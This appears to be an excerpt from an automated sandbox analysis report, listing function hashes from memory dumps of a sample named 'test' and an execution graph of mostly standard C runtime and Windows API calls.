                                                                                                          • Opcode ID: dd75d7e48007a0bdadfd37c17be5f687d4d05a4fe659911835fdd3f96376eb9d
                                                                                                          • Instruction ID: 4df1d3319fac2383a7bc99bd62ebe835da8cb15124f6b172851b2cb00fd53a93
                                                                                                          • Opcode Fuzzy Hash: dd75d7e48007a0bdadfd37c17be5f687d4d05a4fe659911835fdd3f96376eb9d
                                                                                                          • Instruction Fuzzy Hash: 7502AD30B012018FD714EF64D490B6AB7E2EFC5348F158568DA16AF7A5DF78AC49CB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00AB8 Relevance: .2, Instructions: 162COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 467dea96bbafe13ee8bd71226724729c83867969206f536846d1bc929cedfde3
                                                                                                          • Instruction ID: 6d5d26c0bbf194483e4910ba4699f84243aec79b9562036c4cedcae5072f2e9d
                                                                                                          • Opcode Fuzzy Hash: 467dea96bbafe13ee8bd71226724729c83867969206f536846d1bc929cedfde3
                                                                                                          • Instruction Fuzzy Hash: 58518F30B101049FCB54DF68D498AAEBBF6AF89704F1581AAE506EF3A5CF75DC018B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00920 Relevance: .1, Instructions: 131COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e7f7bbc43f1d902a0df8ebd88ac6c0f6963a703db9637e0617ed43607434902
                                                                                                          • Instruction ID: bea1888b22be63f37e00baaf22f60e09584715f90a095e39dd6653298dfbf077
                                                                                                          • Opcode Fuzzy Hash: 6e7f7bbc43f1d902a0df8ebd88ac6c0f6963a703db9637e0617ed43607434902
                                                                                                          • Instruction Fuzzy Hash: 8941AD31B042058FCB149B68C4A8BAEBBF2AF89244F1484A9E105EF3A1DB74DC05CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F006A0 Relevance: .1, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: aa4ed3b3507cb69539b9ef0c97f7340e321c08c6549b07fe035c16ba9bdbd521
                                                                                                          • Instruction ID: e8b02568e0b1361a001b87248c88dd578c97d7aacef0dc6f1ca3b516e83760da
                                                                                                          • Opcode Fuzzy Hash: aa4ed3b3507cb69539b9ef0c97f7340e321c08c6549b07fe035c16ba9bdbd521
                                                                                                          • Instruction Fuzzy Hash: BE51C434612201CFC758FF28E4858997772FB85209B518979DD11AB26CEB3DAD4ACF82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00DD0 Relevance: .1, Instructions: 115COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 39b43349636fd6d275ec18dae4dedb45d30154b1e836eb78001334d3efaece26
                                                                                                          • Instruction ID: 1e85288071ad00f8a0c1a763be4b6f05c4b48421b851684ae3260c4403d88335
                                                                                                          • Opcode Fuzzy Hash: 39b43349636fd6d275ec18dae4dedb45d30154b1e836eb78001334d3efaece26
                                                                                                          • Instruction Fuzzy Hash: 2631C071F04109AFCB14EBB884516AEBBF6EFC9244F1485BAC50AEB741DB349D428791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00F39 Relevance: .1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd7088c7d1853bd505445c12d0f49179f149e259655bd196c414b2efe5d0a98c
                                                                                                          • Instruction ID: 794dc0af0224cc17758a509da2f02e5e33ce24d1f7439578670ced7c3bbcafe3
                                                                                                          • Opcode Fuzzy Hash: cd7088c7d1853bd505445c12d0f49179f149e259655bd196c414b2efe5d0a98c
                                                                                                          • Instruction Fuzzy Hash: 5731BF71F042129FCB54DB788491AAEBBF6AFC9208B14407DE545DB3A0EF349C068791
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00910 Relevance: .1, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ae56142edad82af97303cb3b906c3a41688193b8e7b7ebe164a65db62163e2b4
                                                                                                          • Instruction ID: 349374b00a04c581e6adf78feb74d1a55494e8bc51cc44dacd368eac9f3adf24
                                                                                                          • Opcode Fuzzy Hash: ae56142edad82af97303cb3b906c3a41688193b8e7b7ebe164a65db62163e2b4
                                                                                                          • Instruction Fuzzy Hash: 64316930A002059FDB24DF69C498BAEBBF2FF89304F1485A9E501AB7A1CB75DC45CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0153D3B4 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_153d000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 43ec388df2a85bb5351dd36c2200aca537e1439e9e2116d612965c56a7801dc4
                                                                                                          • Instruction ID: 08420c99fb311e3efa36c684dd6bc6cf4230535bf9b6e19ebf850046103b5452
                                                                                                          • Opcode Fuzzy Hash: 43ec388df2a85bb5351dd36c2200aca537e1439e9e2116d612965c56a7801dc4
                                                                                                          • Instruction Fuzzy Hash: FA2145B1504240DFCB05CF94D8C0B6ABBB1FBC8324F60C968E9094F206C376E856C7A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0153D4A0 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_153d000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 52a5370a534b719ed3429e6c75ffdaac8e0f9b811588b6162a8c8b97c9adf21c
                                                                                                          • Instruction ID: 9f2547a781e30e1df7c30e586ac20156bb9ad21bcc7bfa482523a52ced1e05cf
                                                                                                          • Opcode Fuzzy Hash: 52a5370a534b719ed3429e6c75ffdaac8e0f9b811588b6162a8c8b97c9adf21c
                                                                                                          • Instruction Fuzzy Hash: 7D2136B1504240DFDB05CF84D8C0B2ABFB5FBC8328F608568E9094F246C336D855C7A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00598 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9d5c148db99d610b5cb97c409df8bcdc1c81fe91c2f83adc1fb39a58e1a0a0b8
                                                                                                          • Instruction ID: 416b8fe211a11659a26231e3cc1f553f8b8b2c03aff96127ce86e9c3d7674164
                                                                                                          • Opcode Fuzzy Hash: 9d5c148db99d610b5cb97c409df8bcdc1c81fe91c2f83adc1fb39a58e1a0a0b8
                                                                                                          • Instruction Fuzzy Hash: B4217475B152119FDBB89FB0D99977E36A5AB84389B01003DA917D6284FF348808EF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F005A8 Relevance: .1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f248233016fe2358f1edb40ca2a5426ccfaffc9db89cc31d375ea24c0b51d473
                                                                                                          • Instruction ID: 0a14125bf5a044f0cf543931ddf805da4f03091164a6346c39aca49ff393b19e
                                                                                                          • Opcode Fuzzy Hash: f248233016fe2358f1edb40ca2a5426ccfaffc9db89cc31d375ea24c0b51d473
                                                                                                          • Instruction Fuzzy Hash: 62218634B152218FDB68ABF0D59877E36A5AB84289B41043C9E16D62C4FF348408EF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0153D49B Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_153d000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
                                                                                                          • Instruction ID: 4d822349ed4f44cddb8294578f94bed27641a1b23a35f8b4ced36a7aec0a8fb5
                                                                                                          • Opcode Fuzzy Hash: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
                                                                                                          • Instruction Fuzzy Hash: 6711B176804280CFDB12CF58D9C4B1ABF72FB84324F24C6A9D9054B657C33AD55ACBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0153D3AF Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703457193.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_153d000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
                                                                                                          • Instruction ID: dfc7475af190e5b61b55e3e9a3bcad8dac6d732c057754ba30478fe4402aae18
                                                                                                          • Opcode Fuzzy Hash: 17caa385876f5e1c7a045316c60cbc61f5624ac8f19059c857d985ea651f088b
                                                                                                          • Instruction Fuzzy Hash: 9811B176404280CFCB12CF54D9C4B5ABF71FB84324F24C6A9D8454B616C37AE456CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F01031 Relevance: .1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4cf6f9e6222a2abf9ef43ad61ac91c33f110056a7c09d34ff91e5136be5ec97b
                                                                                                          • Instruction ID: f68b4d5343d9bc8dfdf93c47ad8253dddb1d7312500a63d3f9436247aaed7d63
                                                                                                          • Opcode Fuzzy Hash: 4cf6f9e6222a2abf9ef43ad61ac91c33f110056a7c09d34ff91e5136be5ec97b
                                                                                                          • Instruction Fuzzy Hash: 0811E575B00244CFCB64EF78C455AAA7BF5EF8925970544B8C949EB361EB39CC0ACB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F01040 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 787a79ba8fdcb2458ab572e43222ce13517b96fa179e1519929f2d4ec063d033
                                                                                                          • Instruction ID: fe2313125f6ea66c6cb355b4bedc76b4a38ff161735baad3dbe1d8fc55cbd3eb
                                                                                                          • Opcode Fuzzy Hash: 787a79ba8fdcb2458ab572e43222ce13517b96fa179e1519929f2d4ec063d033
                                                                                                          • Instruction Fuzzy Hash: 1011AD70B00214CFCB68EF78C545A6E7BE6EF896897054478C90AEB350EB39DC09CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00A3D Relevance: .0, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 485681ad64b99c239330367cc2e4df658944789ba3a26fdebe6871a2d3f34911
                                                                                                          • Instruction ID: 3d9a6dc63475d86bc8f5629c095fd47a85174bc43a192e49fcb83c74d00b3a91
                                                                                                          • Opcode Fuzzy Hash: 485681ad64b99c239330367cc2e4df658944789ba3a26fdebe6871a2d3f34911
                                                                                                          • Instruction Fuzzy Hash: 6D01CD313093514FC359977498685AE3BE7AFCA1A931540FAD109DF3B2DE358C0687A6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00A80 Relevance: .0, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9e9d1415776253c042f5f2725cb721717b48fbbac66f5ce1de301bbc47642d8
                                                                                                          • Instruction ID: dff255ad95054e7ca1a5f15e47f04d6fa1eaea0fcead15c0b27a487304bf2fbd
                                                                                                          • Opcode Fuzzy Hash: b9e9d1415776253c042f5f2725cb721717b48fbbac66f5ce1de301bbc47642d8
                                                                                                          • Instruction Fuzzy Hash: 3CE0C2363002104F8358967EA88889BB7DEEFCC1B93150079F10EC7365DE71DC058790
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F00673 Relevance: .0, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 17eef53014dd376c84ed5b5426f1d423baa8b687b7ca66eac0c49cec87d6eb10
                                                                                                          • Instruction ID: d867914bb08a0e5cdfe6f61742e574724af23e29a0483b8825b9b6625d970020
                                                                                                          • Opcode Fuzzy Hash: 17eef53014dd376c84ed5b5426f1d423baa8b687b7ca66eac0c49cec87d6eb10
                                                                                                          • Instruction Fuzzy Hash: A3C0126451A1908FD73457E0904C718351657E0248F014059A6124D8C4DF340808AB01
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02F0068F Relevance: .0, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 438ef5c7d742f2fce319422b19ffa272fe13488daf4952561d669ea1af491ece
                                                                                                          • Instruction ID: da16f402b692412301e3d530d6c7fc04aef3cf4c1ba90b7efe4171970134c9c4
                                                                                                          • Opcode Fuzzy Hash: 438ef5c7d742f2fce319422b19ffa272fe13488daf4952561d669ea1af491ece
                                                                                                          • Instruction Fuzzy Hash: B3C0126851A2918FD33867E0908CB2C291A6BE0348F028059AA228E9C8DF340808AF12
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:19.3%
                                                                                                          Total number of Nodes:264
                                                                                                          Total number of Limit Nodes:6
                                                                                                          execution_graph 1443 407f20 1450 406340 1443->1450 1445 407f2b __initp_misc_winsig __init_pointers 1453 412e40 1445->1453 1451 406270 __encode_pointer 7 API calls 1450->1451 1452 40634c 1451->1452 1452->1445 1454 406270 __encode_pointer 7 API calls 1453->1454 1455 407f8b 1454->1455 1456 406270 TlsGetValue 1455->1456 1457 4062b7 1456->1457 1458 40628f 1456->1458 1468 406310 GetModuleHandleW 1457->1468 1458->1457 1459 406298 TlsGetValue 1458->1459 1464 4062ae 1459->1464 1462 4062cd GetProcAddress 1463 4062df 1462->1463 1465 4062e1 1463->1465 1464->1457 1464->1465 1466 4062f3 RtlEncodePointer 1465->1466 1467 4062fd 1465->1467 1466->1467 1469 4062c1 1468->1469 1470 40632e 1468->1470 1469->1462 1469->1463 1472 407970 1470->1472 1475 407986 1472->1475 1473 40798c Sleep GetModuleHandleW 1474 4079b8 1473->1474 1473->1475 1474->1469 1475->1473 1475->1474 1476 40bfa0 HeapCreate 1477 40bfca 1476->1477 1478 40bfce __heap_init 1476->1478 1478->1477 1479 40bfe1 1478->1479 1483 40d260 HeapAlloc 1479->1483 1482 40bff2 HeapDestroy 1482->1477 1484 40bfeb 1483->1484 1484->1477 1484->1482 1485 4020e0 1488 40ae40 1485->1488 1487 4020ea 1489 40ae81 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1488->1489 1490 40ae62 1488->1490 1492 40aee3 1489->1492 1490->1489 1491 40ae6e 1490->1491 1491->1487 1492->1491 1493 404e40 1494 404e4d 1493->1494 1496 404e4b 1493->1496 1497 404770 1494->1497 1504 404670 1497->1504 1499 40479f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1500 404899 GetCurrentProcess TerminateProcess 1499->1500 1501 404889 __invalid_parameter 1499->1501 1506 40ee60 1500->1506 1501->1500 1503 4048b5 1503->1496 1505 40467c __VEC_memzero 1504->1505 1505->1499 1507 40ee68 1506->1507 1508 40ee6a IsDebuggerPresent 1506->1508 1507->1503 1514 40c9d0 1508->1514 1511 4172ef SetUnhandledExceptionFilter UnhandledExceptionFilter 1512 417318 GetCurrentProcess TerminateProcess 1511->1512 1513 41730e __invalid_parameter 1511->1513 1512->1503 1513->1512 1514->1511 1637 40d060 1638 40d0a4 1637->1638 1648 40d09f __free_base 1637->1648 1639 40d13c HeapFree 1638->1639 1641 40d0b1 ___sbh_find_block 1638->1641 1640 40d157 GetLastError 1639->1640 1639->1648 1640->1648 1644 40d0e4 1641->1644 1649 40d390 1641->1649 1656 40d0f5 1644->1656 1646 40d106 HeapFree 1647 40d122 GetLastError 1646->1647 1646->1648 1647->1648 1652 40d3ed 1649->1652 1655 40d3e8 1649->1655 1650 40d7f3 VirtualFree 1651 40d880 1650->1651 1653 40d8a4 VirtualFree HeapFree 1651->1653 1651->1655 1652->1650 1652->1655 1659 4166a0 1653->1659 1655->1644 1663 40abf0 LeaveCriticalSection 1656->1663 1658 40d0f3 1658->1646 1658->1648 1660 4166b8 1659->1660 1661 4166e7 1660->1661 1662 4166df __VEC_memcpy 1660->1662 1661->1655 1662->1661 1663->1658 1664 406920 1665 406962 1664->1665 1669 406a86 1664->1669 1666 406a55 InterlockedDecrement 1665->1666 1667 406a63 1665->1667 1666->1667 1670 406a88 1667->1670 1673 40abf0 LeaveCriticalSection 1670->1673 1672 406a8f 1672->1669 1673->1672 1674 408020 1682 4081e0 1674->1682 1676 4081cb 1677 4081e0 _ValidateLocalCookies 5 API calls 1677->1676 1678 4080e6 __except_handler4 1678->1676 1678->1677 1680 408061 __IsNonwritableInCurrentImage __except_handler4 1680->1678 1681 4081e0 _ValidateLocalCookies 5 API calls 1680->1681 1688 41318a RtlUnwind 1680->1688 1681->1680 1683 4081f0 1682->1683 1684 408215 1682->1684 1685 40ee60 _ValidateLocalCookies 5 API calls 1683->1685 1686 40ee60 _ValidateLocalCookies 5 API calls 1684->1686 1685->1684 1687 40823b 1686->1687 1687->1680 1689 41319f 1688->1689 1689->1680 1690 404520 1691 40452b 1690->1691 1692 40453b 1690->1692 1691->1692 1693 404770 __invoke_watson 10 API calls 1691->1693 1693->1692 1515 4163c0 1516 4163db 1515->1516 1517 4163e9 1516->1517 1519 404700 1516->1519 1524 406360 TlsGetValue 1519->1524 1521 404717 __invalid_parameter 1522 404770 __invoke_watson 10 API calls 1521->1522 1523 404723 1521->1523 1522->1523 1523->1517 1525 40637f 1524->1525 1530 40639e 1524->1530 1527 406388 TlsGetValue 1525->1527 1525->1530 1526 406310 __crt_wait_module_handle 3 API calls 1528 4063b1 1526->1528 1527->1530 1529 4063bd GetProcAddress 1528->1529 1531 4063cf 1528->1531 1529->1531 1530->1526 1530->1531 1531->1521 1532 416480 1533 406340 _doexit 7 API calls 1532->1533 1534 416494 1533->1534 1535 4164b9 LoadLibraryA 1534->1535 1537 41657f 1534->1537 1536 4164d4 GetProcAddress 1535->1536 1548 4164cd 1535->1548 1538 4164f3 1536->1538 1536->1548 1540 4165ba 1537->1540 1541 406360 __encode_pointer 6 API calls 1537->1541 1542 406270 __encode_pointer 7 API calls 1538->1542 1539 416628 1551 406360 __encode_pointer 6 API calls 1539->1551 1556 416604 1539->1556 1540->1539 1545 406360 __encode_pointer 6 API calls 1540->1545 1540->1556 1546 4165a8 1541->1546 1543 4164fc GetProcAddress 1542->1543 1547 406270 __encode_pointer 7 API calls 1543->1547 1544 406360 __encode_pointer 6 API calls 1544->1548 1545->1539 1549 406360 __encode_pointer 6 API calls 1546->1549 1550 416519 GetProcAddress 1547->1550 1549->1540 1552 406270 __encode_pointer 7 API calls 1550->1552 1551->1556 1553 416536 GetProcAddress 1552->1553 1554 406270 __encode_pointer 7 API calls 1553->1554 1555 416559 1554->1555 1555->1537 1557 41656a GetProcAddress 1555->1557 1556->1544 1558 406270 __encode_pointer 7 API calls 1557->1558 1558->1537 1559 417b80 1562 417800 1559->1562 1561 417ba0 1563 417815 1562->1563 1564 41786a 1563->1564 1566 41789d _memset 1563->1566 1565 404700 __invalid_parameter 16 API calls 1564->1565 1573 417890 _memset _LocaleUpdate::~_LocaleUpdate 1565->1573 1567 4179ac __isleadbyte_l 1566->1567 1568 41796c 1566->1568 1574 4174b0 1567->1574 1570 404700 __invalid_parameter 16 API calls 1568->1570 1570->1573 1571 4179c6 _memset 1572 404700 __invalid_parameter 16 API calls 1571->1572 1571->1573 1572->1573 1573->1561 1575 4174c5 1574->1575 1576 41754a 1575->1576 1577 41751c 1575->1577 1586 4174cb _LocaleUpdate::~_LocaleUpdate _strlen 1575->1586 1579 417560 __isleadbyte_l 1576->1579 1580 417764 __isleadbyte_l 1576->1580 1578 404700 __invalid_parameter 16 API calls 1577->1578 1578->1586 1581 4175f2 MultiByteToWideChar 1579->1581 1579->1586 1582 4177a6 MultiByteToWideChar 1580->1582 1580->1586 1583 417620 GetLastError 1581->1583 1581->1586 1582->1586 1585 417655 __isleadbyte_l 1583->1585 1583->1586 1584 41770a MultiByteToWideChar 1584->1586 1585->1584 1585->1586 1586->1571 1704 412e60 1706 412e9a 1704->1706 1708 41a780 1706->1708 1709 41a7a6 1708->1709 1718 410930 1709->1718 1711 41a89e 1721 407a90 1711->1721 1712 41a7b5 _memset 1712->1711 1714 41a864 SetUnhandledExceptionFilter UnhandledExceptionFilter 1712->1714 1714->1711 1716 40ee60 _ValidateLocalCookies 5 API calls 1717 412ece 1716->1717 1719 406360 __encode_pointer 6 API calls 1718->1719 1720 410940 1719->1720 1720->1712 1724 407c80 1721->1724 1726 407cb7 _doexit 1724->1726 1728 406360 __encode_pointer 6 API calls 1726->1728 1735 407d6a __initterm 1726->1735 1729 407cf3 1728->1729 1730 406360 __encode_pointer 6 API calls 1729->1730 1729->1735 1738 407d0f 1730->1738 1734 407aa2 1734->1716 1739 407e38 1735->1739 1736 406360 6 API calls __encode_pointer 1736->1738 1737 406340 7 API calls _doexit 1737->1738 1738->1735 1738->1736 1738->1737 1740 407e36 1739->1740 1741 407e3e 1739->1741 1740->1734 1743 407f00 1740->1743 1742 407f00 _doexit LeaveCriticalSection 1741->1742 1742->1740 1749 40abf0 LeaveCriticalSection 1743->1749 1745 407e5b 1746 407ec0 1745->1746 1747 407e80 1746->1747 1748 407ece ExitProcess 1747->1748 1749->1745 1587 40a910 1588 40a928 1587->1588 1590 40a97f 1588->1590 1591 412fc0 InitializeCriticalSectionAndSpinCount 1588->1591 1592 413051 1591->1592 1592->1588 1593 406410 TlsGetValue 1594 40642b 1593->1594 1595 40644d 1593->1595 1596 406360 __encode_pointer 6 API calls 1594->1596 1597 406437 TlsSetValue 1596->1597 1597->1595 1750 403d70 1751 403d7c ___sbh_verify_block 1750->1751 1752 403d83 __CrtIsValidHeapPointer 1750->1752 1752->1751 1753 403df0 HeapValidate 1752->1753 1754 403da7 ___sbh_find_block 1752->1754 1753->1751 1754->1751 1755 403dd6 HeapValidate 1754->1755 1755->1751 1756 406b30 1757 406b3e 1756->1757 1758 406bb4 _memset 1757->1758 1759 406b84 1757->1759 1761 406c49 1758->1761 1764 406c79 _memset 1758->1764 1760 404700 __invalid_parameter 16 API calls 1759->1760 1763 406ba7 _memset 1760->1763 1762 404700 __invalid_parameter 16 API calls 1761->1762 1762->1763 1764->1763 1765 404700 __invalid_parameter 16 API calls 1764->1765 1765->1763 1598 412250 1599 41225e 1598->1599 1600 4122bd 1599->1600 1603 4122ed _memset 1599->1603 1605 41226a _memset 1599->1605 1601 404700 __invalid_parameter 16 API calls 1600->1601 1601->1605 1602 4123e4 1604 404700 __invalid_parameter 16 API calls 1602->1604 1603->1602 1603->1605 1606 412414 _memset _strncpy_s 1603->1606 1604->1605 1606->1605 1607 404700 __invalid_parameter 16 API calls 